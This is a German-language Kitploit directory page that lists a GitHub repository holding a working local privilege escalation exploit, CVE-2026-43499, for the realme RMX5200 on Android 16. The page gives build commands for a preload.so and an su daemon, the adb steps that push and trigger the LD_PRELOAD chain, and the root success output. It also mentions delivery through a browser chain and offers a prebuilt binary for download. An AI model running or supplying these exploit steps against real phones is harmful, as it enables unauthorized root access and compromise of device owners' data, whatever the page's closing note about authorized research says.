Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-43499-RMX5200 — Android 16 lokaler Privilegieneskalations-Exploit für realme RMX5200 unter Verwendung der LD_PRELOAD-basierten preload.so-Kette, um temporären Root-Zugriff über CVE-2026-43499 zu erreichen. | Kitploit
Tools/GitHubGitHub/sorrow404null/cve-2026-43499-rmx5200
Android-SicherheitPrivilege EscalationExploit-FrameworksExploitationShellcodePost-ExploitationMobile SicherheitPayload-EntwicklungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubsorrow404null/cve-2026-43499-rmx5200

CVE-2026-43499-RMX5200

Android 16 lokaler Privilegieneskalations-Exploit für realme RMX5200 unter Verwendung der LD_PRELOAD-basierten preload.so-Kette, um temporären Root-Zugriff über CVE-2026-43499 zu erreichen.

Repository anzeigen
6122vor 1 MonatNoch nicht geprüft

CVE-2026-43499 für realme RMX5200

CVE-2026-43499 lokale Privilegieneskalation SO für:

ElementWert
Gerätrealme RMX5200 / RE6030L1
Android16
Kernel6.12.23-android16-5-gb2a876903b49-ab14541642-4k
Fingerprintrealme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys

Vorgefertigte Binärdatei: bin/preload.so

Dieses Repository enthält nur den SO-Build-Baum (Quellen + Offsets + vorgefertigt). Kein Browser-Harness, keine Firmware-Dumps, kein Test-Gerüst.

Basiert auf der öffentlichen IonStack-/Popsicle-artigen Kette; Offsets wurden aus den boot.img + xbl_config.img dieses Geräts neu generiert.


Aufbau

root@kitploit:~
.
├── bin/preload.so              # prebuilt aarch64 shared object (verified)
├── generate_target.py          # optional: regenerate target.h from boot+xbl
├── source/
│   ├── Makefile
│   └── src/
│       ├── target.h            # RMX5200 offsets
│       ├── main.c preload.c slide.c ...
│       └── kernelsnitch/
└── README.md

Build

Anforderungen:

  • Android NDK (r27+ empfohlen)
  • Python 3 + llvm-objdump (nur beim Neugenerieren von target.h)

Mit make

root@kitploit:~
# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload

# Windows NDK example
make -C source clean preload \
  NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
  NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"

Ausgabe:

root@kitploit:~
source/build/bin/preload.so

Ohne make (direkt mit clang)

root@kitploit:~
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"

$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
  src/su_daemon.c -o build/embed/su_daemon_aarch64_pie

$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
  -DTARGET_CONFIG_H=\"target.h\" \
  src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
  src/preload.c src/su_blob.S \
  -shared -o build/bin/preload.so -pthread

Offsets neu generieren (optional)

Benötigt passende Firmware-Images (hier nicht enthalten):

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  --llvm-objdump llvm-objdump \
  -o source/src/target.h

Ausführen

ADB LD_PRELOAD

root@kitploit:~
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

Browser-Kette (extern)

Laden Sie diese preload.so über einen Firefox-151 lonStack-artigen Host (z.B. Rootme-Geräteeintrag). Nicht in diesem Repository enthalten.

Erfolgsmarkierungen:

root@kitploit:~
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
root@kitploit:~
uid=0(root) gid=0(root) ... context=kernel

Hinweise

  • Nur temporärer Root — nach Neustart verloren.
  • Nach Erfolg können einige Apps die Framework-Initialisierung bis zum Neustart verweigern (gleiche Art von Nebeneffekt wie bei verwandten öffentlichen Zielen).
  • Offsets sind build-spezifisch. Andere OTA-Builds benötigen ein neues target.h / Neubau.
  • Für autorisierte Sicherheitsforschung an eigenen Geräten.

Danksagungen

  • Öffentlicher Forschungskontext: IonStack / CVE-2026-43499 Writeups
  • Implementierungslinie: Popsicle-artige preload.so-Kette
  • Geräteanpassung: RMX5200 (RE6030L1)
Tool herunterladen